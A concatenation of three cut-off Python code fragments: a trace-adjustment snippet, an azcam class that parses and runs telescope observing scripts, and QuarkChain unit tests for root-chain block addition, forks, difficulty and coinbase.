if name not in self.keep_sites:
trace.remove_node(name)
continue
def _adjust_to_data(self, trace, data_trace):
for name, site in list(trace.nodes.items()):
# Adjust subsample sites
if site_is_subsample(site):
site["fn"] = data_trace.nodes[name]["fn"]
site["value"] = data_trace.nodes[name]["value"]
# Adjust sites under conditionally independent stacks
try:
site["cond_indep_stack"] = data_trace.nodes[name]["cond_indep_stack"]
site["fn"] = data_trace.nodes[name]["fn"]
for cis in site["cond_indep_stack"]:
# Select random sub-indices | |
"""
Observe class.
Notes:
IPython config needs:
c.InteractiveShellApp.gui = 'qt'
c.InteractiveShellApp.pylab = 'qt'
"""
import os
import time
from tkinter import E
import azcam
class ObserveCommon(object):
"""
The ObserveCommon class which implements observing scripts.
"""
    def __init__(self, tool_id="observe", description=None):
        """
        Create the observing-script tool.

        Args:
            tool_id: identifier for this tool (unused in this body --
                presumably consumed by a subclass or registry; TODO confirm).
            description: optional description (also unused here).
        """
        self.mock = 0  # True to NOT execute commands
        self.debug = 0  # True for debugging
        self.verbose = 1  # True to print commands during run()
        self.number_cycles = 1  # Number of times to run the script.
        self.move_telescope_during_readout = 0  # True to move the telescope during camera readout
        self.increment_status = 0  # True to increment status count if command in completed
        self._abort_gui = 0  # internal abort flag to stop
        self._paused = 0  # internal pause flag
        self._do_highlight = 0  # internal highlight row flag
        self.script_file = ""  # filename of observing commands script file
        self.out_file = ""  # output file showing executed commands
        self.lines = []  # raw non-blank lines read from the script file
        self.commands = []  # list of dictionaries for each command to be executed
        self.current_line = -1  # current line being executed
        self.current_filter = ""  # current filter
        self._abort_script = 0  # internal abort flag to stop script
        self.data = []  # list of dictionaries for each command to be executed
        #: focus tool for motion - usually "instrument" or "telescope"
        self.focus_component = "instrument"
        #: Coordinates mode - True to use AZ/ALT instead of RA/DEC
        self.azalt_mode = False
        self.gui_mode = 0  # nonzero when a GUI (self.ui) is attached -- TODO confirm
def help(self):
"""
Print help on scripting commands.
"""
print("Observing script help...")
print("")
print('Always use double quotes (") when needed')
print("")
print("Comment lines start with # or !")
print("")
print("obs ExposureTime imagetype Title NumberExposures Filter RA DEC Epoch")
print("test ExposureTime imagetype Title NumberExposures Filter RA DEC Epoch")
print("")
print("stepfocus RelativeNumberSteps")
print("steptel RA_ArcSecs Dec_ArcSecs")
print("movetel RA Dec Epoch")
print("movefilter FilterName")
print("")
print("delay NumberSecs")
print('print hi there"')
print('prompt "press any key to continue..."')
print("quit quit script")
print("")
print("Script line examples:")
print('obs 10.5 object "M31 field F" 1 u 00:36:00 40:30:00 2000.0 ')
print('obs 2.3 dark "mike test dark" 2 u')
print("stepfocus 50")
print("delay 3")
print("stepfocus -50")
print("steptel 12.34 12.34")
print("# this is a comment line")
print("! this is also a comment line")
print("movetel 112940.40 +310030.0 2000.0")
print("")
return
def _get_focus(
self,
focus_id: int = 0,
):
if self.focus_component == "instrument":
return azcam.db.tools["instrument"].get_focus(focus_id)
elif self.focus_component == "telescope":
return azcam.db.tools["telescope"].get_focus(focus_id)
def _set_focus(self, focus_value: float, focus_id: int = 0, focus_type: str = "absolute"):
if self.focus_component == "instrument":
return azcam.db.tools["instrument"].set_focus(focus_value, focus_id, focus_type)
elif self.focus_component == "telescope":
return azcam.db.tools["telescope"].set_focus(focus_value, focus_id, focus_type)
def read_file(self, script_file):
"""
Read an observing script file into the .lines list.
Args:
script_file: full path name of script file.
"""
self.script_file = script_file
# make output filename by appending _out to base filename
base, ext = os.path.splitext(self.script_file)
self.out_file = base + "_out" + ext
# read file
with open(self.script_file, "r") as sfile:
all_lines = sfile.readlines()
# save all lines
self.lines = []
self.commands = [] # list of dictionaries, one for each line
for line in all_lines:
if line == "\n":
continue
line = line.strip()
self.lines.append(line)
return
def parse(self):
"""
Parse current line set into self.commands dictionary.
The script file must have already been read using read_file().
"""
for linenumber, line in enumerate(self.lines):
expose_flag = 0
movetel_flag = 0
steptel_flag = 0
movefilter_flag = 0
movefocus_flag = 0
wave = ""
focus = ""
ra = ""
dec = ""
raNext = ""
decNext = ""
epoch = ""
exptime = 0.0
imagetype = ""
arg = ""
title = ""
numexposures = 0
status = 0
tokens = azcam.utils.parse(line)
# comment line, special case
if line.startswith("#") or line.startswith("!") or line.startswith("comment"):
cmd = "comment"
arg = line[1:].strip()
# if the first token is a number, it is a status flag - save and remove from parsing
elif tokens[0].isdigit():
status = int(tokens[0])
line = line.lstrip(tokens[0]).strip()
tokens = tokens[1:] # reset tokens to not include status
cmd = tokens[0].lower()
else:
status = -1 # indicates no status value
cmd = tokens[0].lower()
# comment
if cmd == "comment":
pass
# prompt, use quotes for string
elif cmd == "prompt":
arg = tokens[1]
# immediately set a value
elif cmd == "set":
attribute = tokens[1]
value = tokens[2]
arg = " ".join(tokens[1:])
if attribute == "mock":
self.mock = int(value)
elif attribute == "debug":
self.debug = int(value)
elif attribute == "azalt_mode":
self.azalt_mode = int(value)
if self.gui_mode:
self.ui.checkBox_azalt.setChecked(self.azalt_mode)
elif attribute == "move_telescope_during_readout":
self.move_telescope_during_readout = int(value)
elif attribute == "number_cycles":
self.number_cycles = int(value)
if self.gui_mode:
self.ui.spinBox_loops.setValue(self.number_cycles)
continue
# print
elif cmd == "print":
arg = tokens[1]
# issue a raw server which should be in single quotes
elif cmd == "azcam":
arg = tokens[1]
# take a normal observation
elif cmd == "obs":
# obs 10.5 object "M31 field F" 1 U 00:36:00 40:30:00 2000.0
exptime = float(tokens[1])
imagetype = tokens[2]
title = tokens[3].strip('"') # remove double quotes
numexposures = int(tokens[4])
expose_flag = 1
if len(tokens) > 5:
wave = tokens[5].strip('"')
movefilter_flag = 1
if len(tokens) > 6:
ra = tokens[6]
dec = tokens[7]
if len(tokens) > 8:
epoch = tokens[8]
else:
epoch = 2000.0
movetel_flag = 1
else:
ra = ""
dec = ""
epoch = ""
movetel_flag = 0
# take test images
elif cmd == "test":
# test 10.5 object "M31 field F" 1 U 00:36:00 40:30:00 2000.0
exptime = float(tokens[1])
imagetype = tokens[2]
title = tokens[3].strip('"')
numexposures = int(tokens[4])
expose_flag = 1
if len(tokens) > 5:
wave = tokens[5].strip('"')
movefilter_flag = 1
if len(tokens) > 6:
ra = tokens[6]
dec = tokens[7]
if len(tokens) > 8:
epoch = tokens[8]
else:
epoch = 2000.0
movetel_flag = 1
else:
ra = ""
dec = ""
epoch = ""
movetel_flag = 0
# move focus position in relative steps from current position
elif cmd == "stepfocus":
# stepfocus RelativeSteps
focus = float(tokens[1])
movefocus_flag = 1
# move filter
elif cmd == "movefilter":
# movefilter FilterName
wave = tokens[1]
movefilter_flag = 1
# move telescope to absolute RA DEC EPOCH
elif cmd == "movetel":
# movetel ra dec
ra = tokens[1]
dec = tokens[2]
epoch = tokens[3]
movetel_flag = 1
# slew telescope to absolute RA DEC EPOCH
elif cmd == "slewtel":
# slewtel ra dec
ra = tokens[1]
dec = tokens[2]
epoch = tokens[3]
movetel_flag = 1
# move telescope relative RA DEC
elif cmd == "steptel":
# steptel raoffset decoffset
ra = tokens[1]
dec = tokens[2]
movetel_flag = 1
# delay N seconds
elif cmd == "delay":
delay = float(tokens[1])
arg = delay
# quit script
elif cmd == "quit":
pass
else:
azcam.log("command not recognized on line %03d: %s" % (linenumber, cmd))
# get next RA and DEC if next line is obs command
raNext = ""
decNext = ""
epochNext = ""
if linenumber == len(self.lines) - 1: # last line
pass
else:
lineNext = self.lines[linenumber + 1]
tokensNext = azcam.utils.parse(lineNext)
lentokNext = len(tokensNext)
if lentokNext != 0:
cmdNext = tokensNext[0].lower()
if cmdNext == "obs" and lentokNext > 6:
try:
raNext = tokensNext[6]
decNext = tokensNext[7]
epochNext = tokensNext[8]
except Exception:
raNext = ""
decNext = ""
epochNext = ""
else:
pass
data1 = {}
data1["line"] = line
data1["cmdnumber"] = linenumber
data1["status"] = status
data1["command"] = cmd
data1["argument"] = arg
data1["exptime"] = exptime
data1["type"] = imagetype
data1["title"] = title
data1["numexp"] = numexposures
data1["filter"] = wave
data1["focus"] = focus
data1["ra"] = ra
data1["dec"] = dec
data1["ra_next"] = raNext
data1["dec_next"] = decNext
data1["epoch"] = epoch
data1["epoch_next"] = epochNext
data1["expose_flag"] = expose_flag
data1["movetel_flag"] = movetel_flag
data1["steptel_flag"] = steptel_flag
data1["movefilter_flag"] = movefilter_flag
data1["movefocus_flag"] = movefocus_flag
self.commands.append(data1)
return
def log(self, message):
"""
Log a message.
Args:
message: string to be logged.
"""
azcam.log(message)
return
def run(self):
"""
Execute the commands in the script command dictionary.
"""
self._abort_script = 0
# save pars to be changed
impars = {}
azcam.utils.save_imagepars(impars)
# log start info
s = time.strftime("%Y-%m-%d %H:%M:%S")
self.log("Observing script started: %s" % s)
# begin execution loop
for loop in range(self.number_cycles):
if self.number_cycles > 1:
| |
import unittest
import quarkchain.db
from quarkchain.cluster.root_state import RootState
from quarkchain.cluster.shard_state import ShardState
from quarkchain.cluster.tests.test_utils import get_test_env
from quarkchain.core import Address
from quarkchain.core import CrossShardTransactionList
from quarkchain.diff import EthDifficultyCalculator
def create_default_state(env, diff_calc=None):
    """Create a RootState plus one genesis-initialised ShardState per shard.

    One root block is mined and added at the end so that later minor blocks
    will be broadcast to neighbour shards.
    """
    root_state = RootState(env=env, diff_calc=diff_calc)
    shard_states = {}
    for full_shard_id in env.quark_chain_config.get_full_shard_ids():
        shard = ShardState(
            env=env, full_shard_id=full_shard_id, db=quarkchain.db.InMemoryDb()
        )
        mblock, coinbase_amount_map = shard.init_genesis_state(
            root_state.get_tip_block()
        )
        # register the genesis minor block with the root chain
        root_state.add_validated_minor_block_hash(
            mblock.header.get_hash(), coinbase_amount_map.balance_map
        )
        shard_states[full_shard_id] = shard
    # add a root block so that later minor blocks will be broadcasted to neighbor shards
    headers = [state.header_tip for state in shard_states.values()]
    root_block = root_state.create_block_to_mine(headers)
    assert root_state.add_block(root_block)
    for state in shard_states.values():
        assert state.add_root_block(root_block)
    return root_state, shard_states
def add_minor_block_to_cluster(s_states, block):
    """Add block to corresponding shard state and broadcast xshard list to other shards"""
    source_id = block.header.branch.get_full_shard_id()
    s_states[source_id].finalize_and_add_block(block)
    minor_hash = block.header.get_hash()
    # every other shard receives an (empty) cross-shard tx list
    for dst_id, state in s_states.items():
        if dst_id != source_id:
            state.add_cross_shard_tx_list_by_minor_block_hash(
                minor_hash, CrossShardTransactionList(tx_list=[])
            )
class TestRootState(unittest.TestCase):
def test_root_state_simple(self):
env = get_test_env()
state = RootState(env=env)
self.assertEqual(state.tip.height, 0)
    def test_root_state_and_shard_state_add_block(self):
        """Mine one minor block per shard, commit both in a root block, and
        check root-chain lookups and shard root tips stay consistent."""
        env = get_test_env()
        r_state, s_states = create_default_state(env)
        self.assertEqual(r_state.tip.total_difficulty, 2000000)
        # shard states are keyed by full shard id (2 | 0 and 2 | 1)
        s_state0 = s_states[2 | 0]
        s_state1 = s_states[2 | 1]
        b0 = s_state0.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b0)
        b1 = s_state1.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b1)
        # the root chain must validate minor block hashes before their
        # headers can be included in a root block
        r_state.add_validated_minor_block_hash(
            b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
        )
        root_block = r_state.create_block_to_mine([b0.header, b1.header])
        self.assertEqual(root_block.header.total_difficulty, 3000976)
        self.assertTrue(r_state.add_block(root_block))
        # height lookups: height 3 does not exist; None resolves to the tip
        self.assertIsNone(r_state.get_root_block_by_height(3))
        self.assertEqual(r_state.get_root_block_by_height(2), root_block)
        self.assertEqual(r_state.get_root_block_by_height(None), root_block)
        # height-1 lookup agrees with following the tip's prev-block hash
        self.assertEqual(
            r_state.get_root_block_by_height(1),
            r_state.get_root_block_by_hash(root_block.header.hash_prev_block),
        )
        # both shards adopt the new root block as their root tip
        self.assertTrue(s_state0.add_root_block(root_block))
        self.assertEqual(s_state0.root_tip, root_block.header)
        self.assertTrue(s_state1.add_root_block(root_block))
        self.assertEqual(s_state1.root_tip, root_block.header)
    def test_root_state_add_block_no_proof_of_progress(self):
        """Root blocks need no proof of progress: an empty root block and root
        blocks confirming only a single shard's header are all accepted."""
        env = get_test_env()
        r_state, s_states = create_default_state(env)
        s_state0 = s_states[2 | 0]
        s_state1 = s_states[2 | 1]
        # Add each minor block to its own shard only; no cross-shard broadcast
        # is required for what this test asserts.
        b0 = s_state0.create_block_to_mine()
        s_state0.finalize_and_add_block(b0)
        b1 = s_state1.create_block_to_mine()
        s_state1.finalize_and_add_block(b1)
        # Register the minor block hashes so they can be confirmed later.
        r_state.add_validated_minor_block_hash(
            b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
        )
        # An empty root block is accepted.
        root_block = r_state.create_block_to_mine([])
        self.assertTrue(r_state.add_block(root_block))
        # So are root blocks that confirm only one shard's header each.
        root_block = r_state.create_block_to_mine([b0.header])
        self.assertTrue(r_state.add_block(root_block))
        root_block = r_state.create_block_to_mine([b1.header])
        self.assertTrue(r_state.add_block(root_block))
def test_root_state_add_two_blocks(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b0)
b1 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
self.assertTrue(r_state.add_block(root_block0))
b2 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b2)
b3 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b3)
r_state.add_validated_minor_block_hash(
b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
)
root_block1 = r_state.create_block_to_mine([b2.header, b3.header])
self.assertTrue(r_state.add_block(root_block1))
    def test_root_state_and_shard_state_fork(self):
        """Exercise a root-chain fork: a competing root block at the tip's
        height is stored but rejected as tip; extending the fork past the old
        tip switches the root tip and both shards' root tips to the fork."""
        env = get_test_env()
        r_state, s_states = create_default_state(env)
        s_state0 = s_states[2 | 0]
        s_state1 = s_states[2 | 1]
        # b0/b2 (and b1/b3) are sibling minor blocks mined off the same tip.
        b0 = s_state0.create_block_to_mine()
        b2 = s_state0.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b0)
        b1 = s_state1.create_block_to_mine()
        b3 = s_state1.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b1)
        r_state.add_validated_minor_block_hash(
            b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
        )
        # root_block0 becomes the canonical tip; root_block1 will be the fork.
        root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
        root_block1 = r_state.create_block_to_mine([])
        self.assertTrue(r_state.add_block(root_block0))
        self.assertTrue(s_state0.add_root_block(root_block0))
        self.assertTrue(s_state1.add_root_block(root_block0))
        add_minor_block_to_cluster(s_states, b2)
        add_minor_block_to_cluster(s_states, b3)
        r_state.add_validated_minor_block_hash(
            b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
        )
        # Finalize the fork block so it confirms the sibling minor blocks.
        root_block1.add_minor_block_header(b2.header).add_minor_block_header(
            b3.header
        ).finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block1.minor_block_header_list],
                root_block1.header.height,
            )
        )
        # False return: the fork is at the same height and does not become tip.
        self.assertFalse(r_state.add_block(root_block1))
        self.assertFalse(s_state0.add_root_block(root_block1))
        self.assertFalse(s_state1.add_root_block(root_block1))
        b4 = b2.create_block_to_append()
        b5 = b3.create_block_to_append()
        add_minor_block_to_cluster(s_states, b4)
        add_minor_block_to_cluster(s_states, b5)
        r_state.add_validated_minor_block_hash(
            b4.header.get_hash(), b4.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b5.header.get_hash(), b5.header.coinbase_amount_map.balance_map
        )
        # root_block2 extends the fork past the old tip's height.
        root_block2 = (
            root_block1.create_block_to_append()
            .add_minor_block_header(b4.header)
            .add_minor_block_header(b5.header)
        )
        root_block2.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block2.minor_block_header_list],
                root_block2.header.height,
            )
        )
        # Everyone switches to the fork, which is now the best chain.
        self.assertTrue(r_state.add_block(root_block2))
        self.assertTrue(s_state0.add_root_block(root_block2))
        self.assertTrue(s_state1.add_root_block(root_block2))
        self.assertEqual(r_state.tip, root_block2.header)
        self.assertEqual(s_state0.root_tip, root_block2.header)
        self.assertEqual(s_state1.root_tip, root_block2.header)
    def test_root_state_difficulty_and_coinbase(self):
        """Check root-block coinbase computation under varying tax rates and
        the Ethereum-style difficulty adjustment for root blocks."""
        env = get_test_env()
        # Enable real difficulty checking with a known genesis difficulty.
        env.quark_chain_config.SKIP_ROOT_DIFFICULTY_CHECK = False
        env.quark_chain_config.ROOT.GENESIS.DIFFICULTY = 1000
        diff_calc = EthDifficultyCalculator(cutoff=9, diff_factor=2048, minimum_diff=1)
        env.quark_chain_config.NETWORK_ID = (
            1
        )  # other network ids will skip difficulty check
        env.quark_chain_config.REWARD_TAX_RATE = 0.8
        env.quark_chain_config.ROOT.COINBASE_AMOUNT = 5
        for c in env.quark_chain_config.shards.values():
            c.COINBASE_AMOUNT = 5
        r_state, s_states = create_default_state(env, diff_calc=diff_calc)
        s_state0 = s_states[2 | 0]
        s_state1 = s_states[2 | 1]
        # g0/g1: shard tip headers before b0/b1 are mined (used in a later
        # root block to stretch the confirmed-header list).
        g0 = s_state0.header_tip
        b0 = s_state0.get_tip().create_block_to_append()
        add_minor_block_to_cluster(s_states, b0)
        g1 = s_state1.header_tip
        b1 = s_state1.get_tip().create_block_to_append()
        add_minor_block_to_cluster(s_states, b1)
        # Expected per-minor-block coinbase: COINBASE_AMOUNT * (1 - tax)
        # = 5 * 0.2 = 1 in the genesis token.
        self.assertEqual(
            b0.header.coinbase_amount_map.balance_map,
            {env.quark_chain_config.genesis_token: 1},
        )
        self.assertEqual(
            b1.header.coinbase_amount_map.balance_map,
            {env.quark_chain_config.genesis_token: 1},
        )
        r_state.add_validated_minor_block_hash(
            b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
        )
        # Test coinbase
        original_reward_tax_rate = env.quark_chain_config.REWARD_TAX_RATE
        for tax_rate in [0.8, 0.6, 0.9]:
            env.quark_chain_config.REWARD_TAX_RATE = tax_rate
            root_block_tmp = r_state.create_block_to_mine(
                m_header_list=[b0.header, b1.header],
                address=Address.create_empty_account(),
                create_time=r_state.tip.create_time + 9,
            )
            self.assertEqual(root_block_tmp.header.signature, bytes(65))  # empty sig
            # still use minor block's coinbase amount, 1
            # Expected root reward: minor coinbases grossed up by the tax
            # rate plus the root COINBASE_AMOUNT, then rounded.
            self.assertEqual(
                root_block_tmp.header.coinbase_amount_map.balance_map[
                    env.quark_chain_config.genesis_token
                ],
                round((1 + 1) / (1 - tax_rate) * tax_rate + 5),
            )
        env.quark_chain_config.REWARD_TAX_RATE = original_reward_tax_rate
        # Check new difficulty
        # Exactly at the 9-second cutoff: difficulty unchanged.
        root_block0 = r_state.create_block_to_mine(
            m_header_list=[b0.header, b1.header],
            address=Address.create_empty_account(),
            create_time=r_state.tip.create_time + 9,
        )
        self.assertEqual(r_state.tip.difficulty, root_block0.header.difficulty)
        # Faster than the cutoff (3s): difficulty rises by diff // 2048.
        root_block0 = r_state.create_block_to_mine(
            m_header_list=[b0.header, b1.header],
            address=Address.create_empty_account(),
            create_time=r_state.tip.create_time + 3,
        )
        self.assertEqual(
            r_state.tip.difficulty + r_state.tip.difficulty // 2048,
            root_block0.header.difficulty,
        )
        # Slower than the cutoff (26s): difficulty drops by diff // 2048.
        root_block0 = r_state.create_block_to_mine(
            m_header_list=[g0, b0.header, g1, b1.header],
            address=Address.create_empty_account(),
            create_time=r_state.tip.create_time + 26,
        )
        self.assertEqual(
            r_state.tip.difficulty - r_state.tip.difficulty // 2048,
            root_block0.header.difficulty,
        )
    def test_root_state_recovery(self):
        """Recreate a RootState from the same env/DB and check tip selection,
        height indexing, and fork pruning after the restart."""
        env = get_test_env()
        r_state, s_states = create_default_state(env)
        s_state0 = s_states[2 | 0]
        s_state1 = s_states[2 | 1]
        b0 = s_state0.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b0)
        b1 = s_state1.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b1)
        r_state.add_validated_minor_block_hash(
            b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
        )
        root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
        root_block00 = r_state.create_block_to_mine([b0.header, b1.header])
        self.assertTrue(r_state.add_block(root_block0))
        # create a fork
        # Bump create_time so root_block00 hashes differently, then finalize.
        root_block00.header.create_time += 1
        root_block00.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block00.minor_block_header_list],
                root_block00.header.height,
            )
        )
        self.assertNotEqual(
            root_block0.header.get_hash(), root_block00.header.get_hash()
        )
        # The fork does not become the tip but is still stored in the DB.
        self.assertFalse(r_state.add_block(root_block00))
        self.assertEqual(
            r_state.db.get_root_block_by_hash(root_block00.header.get_hash()),
            root_block00,
        )
        b2 = s_state0.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b2)
        b3 = s_state1.create_block_to_mine()
        add_minor_block_to_cluster(s_states, b3)
        r_state.add_validated_minor_block_hash(
            b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
        )
        root_block1 = r_state.create_block_to_mine([b2.header, b3.header])
        self.assertTrue(r_state.add_block(root_block1))
        # now the longest chain is root_block0 <-- root_block1
        # but root_block0 will become the new tip after recovery
        recovered_state = RootState(env=env)
        self.assertEqual(recovered_state.tip, root_block0.header)
        self.assertEqual(recovered_state.db.get_root_block_by_height(2), root_block0)
        self.assertEqual(recovered_state.get_root_block_by_height(None), root_block0)
        # fork is pruned from recovered state
        self.assertIsNone(
            recovered_state.db.get_root_block_by_hash(root_block00.header.get_hash())
        )
        # ...but the raw record is still retrievable when the consistency
        # check is explicitly skipped.
        self.assertEqual(
            recovered_state.db.get_root_block_by_hash(
                root_block00.header.get_hash(), consistency_check=False
            ),
            root_block00,
        )
    def test_add_root_block_with_minor_block_with_wrong_root_block_hash(self):
        """ Test for the following case

                 +--+    +--+
                 |r1|<---|r3|
                /+--+    +--+
               /   |       |
        +--+  /  +--+    +--+
        |r0|<----|m1|<---|m2|
        +--+  \  +--+    +--+
               \   |       |
                \+--+      |
                 |r2|<-----+
                 +--+

        where r3 is invalid because m2 depends on r2, which is not in the r3 chain.
        """
        env = get_test_env(shard_size=1)
        r_state, s_states = create_default_state(env)
        s_state0 = s_states[1 | 0]
        root_block0 = r_state.get_tip_block()
        m1 = s_state0.get_tip().create_block_to_append()
        add_minor_block_to_cluster(s_states, m1)
        r_state.add_validated_minor_block_hash(
            m1.header.get_hash(), m1.header.coinbase_amount_map.balance_map
        )
        # r1 and r2 both confirm m1; distinct nonces give them distinct hashes.
        root_block1 = root_block0.create_block_to_append(
            nonce=0
        ).add_minor_block_header(m1.header)
        root_block1.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block1.minor_block_header_list],
                root_block1.header.height,
            )
        )
        root_block2 = root_block0.create_block_to_append(
            nonce=1
        ).add_minor_block_header(m1.header)
        root_block2.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block2.minor_block_header_list],
                root_block2.header.height,
            )
        )
        # r1 becomes the tip; r2 is a same-height fork (add returns False).
        self.assertTrue(r_state.add_block(root_block1))
        self.assertFalse(r_state.add_block(root_block2))
        self.assertTrue(s_state0.add_root_block(root_block1))
        self.assertFalse(s_state0.add_root_block(root_block2))
        # m2 extends m1 but declares r2 as its previous root block.
        m2 = m1.create_block_to_append()
        m2.header.hash_prev_root_block = root_block2.header.get_hash()
        add_minor_block_to_cluster(s_states, m2)
        r_state.add_validated_minor_block_hash(
            m2.header.get_hash(), m2.header.coinbase_amount_map.balance_map
        )
        # r3 extends r1 yet confirms m2 (which depends on r2, not on the r1
        # chain) -> adding it must raise.
        root_block3 = root_block1.create_block_to_append().add_minor_block_header(
            m2.header
        )
        root_block3.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block3.minor_block_header_list],
                root_block3.header.height,
            )
        )
        with self.assertRaises(ValueError):
            r_state.add_block(root_block3)
        # r4 extends r2 and confirms m2 consistently -> accepted.
        root_block4 = root_block2.create_block_to_append().add_minor_block_header(
            m2.header
        )
        root_block4.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block4.minor_block_header_list],
                root_block4.header.height,
            )
        )
        self.assertTrue(r_state.add_block(root_block4))
    def test_add_minor_block_with_wrong_root_block_hash(self):
        """ Test for the following case

                 +--+
                 |r1|
                /+--+
               /   |
        +--+  /  +--+    +--+
        |r0|<----|m1|<---|m3|
        +--+  \  +--+    +--+
          ^    \   |       |
          |     \+--+      |
          |      |r2|<-----+
          |      +--+
          |        |
          |      +--+
          +------|m2|
                 +--+

        where m3 is invalid because m3 depends on r2, whose minor chain is not the same chain as m3
        """
        env = get_test_env(shard_size=1)
        r_state, s_states = create_default_state(env)
        s_state0 = s_states[1 | 0]
        root_block0 = r_state.get_tip_block()
        # m1 and m2 are sibling minor blocks; nonces keep their hashes apart.
        m1 = s_state0.get_tip().create_block_to_append(nonce=0)
        m2 = s_state0.get_tip().create_block_to_append(nonce=1)
        add_minor_block_to_cluster(s_states, m1)
        add_minor_block_to_cluster(s_states, m2)
        r_state.add_validated_minor_block_hash(
            m1.header.get_hash(), m1.header.coinbase_amount_map.balance_map
        )
        r_state.add_validated_minor_block_hash(
            m2.header.get_hash(), m2.header.coinbase_amount_map.balance_map
        )
        # r1 confirms m1; r2 (a same-height fork of r1) confirms m2.
        root_block1 = root_block0.create_block_to_append(
            nonce=0
        ).add_minor_block_header(m1.header)
        root_block1.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block1.minor_block_header_list],
                root_block1.header.height,
            )
        )
        root_block2 = root_block0.create_block_to_append(
            nonce=1
        ).add_minor_block_header(m2.header)
        root_block2.finalize(
            coinbase_tokens=r_state._calculate_root_block_coinbase(
                [header.get_hash() for header in root_block2.minor_block_header_list],
                root_block2.header.height,
            )
        )
        # r1 becomes the tip; r2 is stored as a fork (add returns False).
        self.assertTrue(r_state.add_block(root_block1))
        self.assertFalse(r_state.add_block(root_block2))
        self.assertTrue(s_state0.add_root_block(root_block1))
        self.assertFalse(s_state0.add_root_block(root_block2))
        # m3 extends m1 but claims r2 (which confirmed the sibling m2) as its
        # previous root block -> the shard must reject it.
        m3 = m1.create_block_to_append()
        m3.header.hash_prev_root_block = root_block2.header.get_hash()
        with self.assertRaises(ValueError):
            add_minor_block_to_cluster(s_states, m3)
        # m4 points at r1, which confirmed its ancestor m1 -> accepted.
        m4 = m1.create_block_to_append()
        m4.header.hash_prev_root_block = root_block1.header.get_hash()
        add_minor_block_to_cluster(s_states, m4)
        # Test recovery
        s_state0_recovered = ShardState(env, full_shard_id=1 | 0, db=s_state0.raw_db)
        s_state0_recovered.init_from_root_block(root_block1)
        # NOTE(review): this re-adds m3 via `s_states` (the original shard
        # state); `s_state0_recovered` itself is not exercised by the
        # assertion below — confirm whether the recovered state was intended.
        with self.assertRaises(ValueError):
            add_minor_block_to_cluster(s_states, m3)
def test_root_state_add_root_block_too_many_minor_blocks(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
headers = []
max_mblock_in_rblock = (
s_state0.shard_config.max_blocks_per_shard_in_one_root_block
)
for i in range(max_mblock_in_rblock + 1):
b = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b)
headers.append(b.header)
r_state.add_validated_minor_block_hash(
b.header.get_hash(), b.header.coinbase_amount_map.balance_map
)
root_block = r_state.create_block_to_mine(
m_header_list=headers, create_time=headers[-1].create_time + 1
)
with self.assertRaisesRegexp(
ValueError, "too many minor blocks in the root block for shard"
):
r_state.add_block(root_block)
headers = headers[:max_mblock_in_rblock]
root_block = r_state.create_block_to_mine(
m_header_list=headers, create_time=headers[-1].create_time + 1
)
r_state.add_block(root_block)
def test_root_chain_fork_using_largest_total_diff(self):
env = get_test_env(shard_size=1)
r_state, s_states = create_default_state(env)
coinbase = r_state._calculate_root_block_coinbase([], 0)
rb0 = r_state.get_tip_block()
# one fork with more blocks but small total diff
rb1 = rb0.create_block_to_append(difficulty=int(1e6)).finalize(coinbase)
rb2 = rb1.create_block_to_append(difficulty=int(1e6)).finalize(coinbase)
# another fork with less blocks but higher total diff
